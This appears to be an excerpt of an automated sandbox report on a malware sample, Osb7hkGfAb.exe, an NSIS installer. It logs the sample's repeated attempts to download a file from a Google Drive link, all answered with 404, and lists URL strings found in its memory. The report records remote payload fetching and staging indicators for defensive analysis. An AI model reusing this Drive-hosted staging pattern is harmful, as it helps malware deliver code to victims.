      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
      Source: global trafficHTTP traffic detected: GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
      Source: global trafficDNS traffic detected: DNS query: drive.google.com
      Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgR8Md_kYyzkQHPJy7LqpY8sov7GfnKuFPC628Gfq7ohmnTOKXT-3Tum-SBFUE6BBTg4wLX_lOQContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 15:02:25 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-77mX5IRpx2Zk0xzZUVtWDQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE; expires=Sat, 12-Jul-2025 15:02:25 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=noneAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgT_YcjhY7Kh8rIgy5B11KQr3YrMH03o4_NQfqTWO2XcBH1-xEIvUqMcyHcVdr3gLfxg1QGM3DQContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 15:02:38 GMTCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-LcpPGtFaaY6oAm4ymA8TBg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC62X_j2AzHGbO8sj7XjJTFZtTRtfC7f6sQRh5GaHFjevS_Yx5RDK6YGPeq1EV58JJEEb8Wf88oContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 15:02:50 GMTContent-Security-Policy: script-src 'nonce-jjnXb5ZA8edhQ2NKVGbbaA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5C-XCaBhbKj5iBfDncOXFZhBwXDtN31UUNg5ZXZGA01I65pplHHMPAI9D4adid0IuhadaDd7QContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 15:03:02 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-hJq8jcQonabOgYIAYTB57Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4ViZTyhzcRvA2jPbZMnMrDGnM-KBu5A7i9uc2RXwRp9rCoWr3Ewt4qgbdLaeCw5oNu3RPsAm0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 15:03:14 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-dmpUTmAVGiz3ysuOg9arxQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgS2xczhJ-v2_mruyq0uC0XKLxAwBIKmg2iy1tupNpO1sZ0zakQZppXAHM_yVo5VcMIUContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 15:03:27 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-zweZO-bAP14EDPNFZg4AXQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgThTYRN7O3f64Kn6biZt94WfS5CnLvSWpPgzj3rLjRl85F-X8fgFs43wy06D-9ZXIizrEpAKtIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 15:03:39 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-AYcaci9eFvP0LcMVswPi7Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5nIunltLmQZYqr8neEQ0YE_O6jOubGEhCqfTIC5mlahuNHO9ljCvxc_mYE7BoBJ8Vwv7HEKXEContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 15:03:51 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-5_tmSxbga8swmxmDa0vFsQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6lav6-uZMJwRtmv2-xrQ6Wrts5kfLgLVx4Q7gvPpDNTBADWRdzA50TqPz0zbtPY9FEYvezCg4Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 15:04:03 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-i-AOsg2TUseIMYgUH_FIdQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTdHiyZGj-LlWeHpQ1ae8TNcUR_QyDTuYfOSndtv-sI9p7jL1lhWb7Q7xwxhxpYrRHH_GLrjEoContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 15:04:15 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-bwxC__Euzb-00dSfBV4RPw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: Osb7hkGfAb.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
      Source: Osb7hkGfAb.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: Osb7hkGfAb.exe, 00000006.00000001.2123046241.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.ftp.ftp://ftp.gopher.
      Source: Osb7hkGfAb.exe, 00000006.00000001.2123046241.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
      Source: Osb7hkGfAb.exe, 00000006.00000001.2123046241.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
      Source: Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
      Source: Osb7hkGfAb.exe, 00000006.00000003.2717350547.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2961383407.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3083072614.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dhttps://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=d
      Source: Osb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002DE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.go
      Source: Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
      Source: Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/#/b
      Source: Osb7hkGfAb.exe, 00000006.00000003.2949977423.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2717350547.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2961383407.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/0h
      Source: Osb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002DD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/6
      Source: Osb7hkGfAb.exe, 00000006.00000003.2340236673.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2474031987.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2351203004.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2462841446.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/B
      Source: Osb7hkGfAb.exe, 00000006.00000003.3083072614.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/DnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
      Source: Osb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3205372774.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/DnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download0
      Source: Osb7hkGfAb.exe, 00000006.00000003.2717350547.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/DnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=downloade
      Source: Osb7hkGfAb.exe, 00000006.00000003.3205372774.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2949977423.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2961383407.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3083072614.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/DnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=downloadxq3
      Source: Osb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3205372774.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3083072614.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/_1
      Source: Osb7hkGfAb.exe, 00000006.00000003.2474031987.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2462841446.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/ificate
      Source: Osb7hkGfAb.exe, 00000006.00000003.2474031987.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2462841446.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/lR
      Source: Osb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3205372774.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/ogle.co.jp
      Source: Osb7hkGfAb.exe, 00000006.00000003.3205372774.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/r
      Source: Osb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3205372774.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3083072614.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/rcontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=do
      Source: Osb7hkGfAb.exe, 00000006.00000003.2949977423.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2717350547.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2961383407.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/th
      Source: Osb7hkGfAb.exe, 00000006.00000003.2351203004.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2961383407.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2462841446.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3083072614.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4
      Source: Osb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002DA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4$
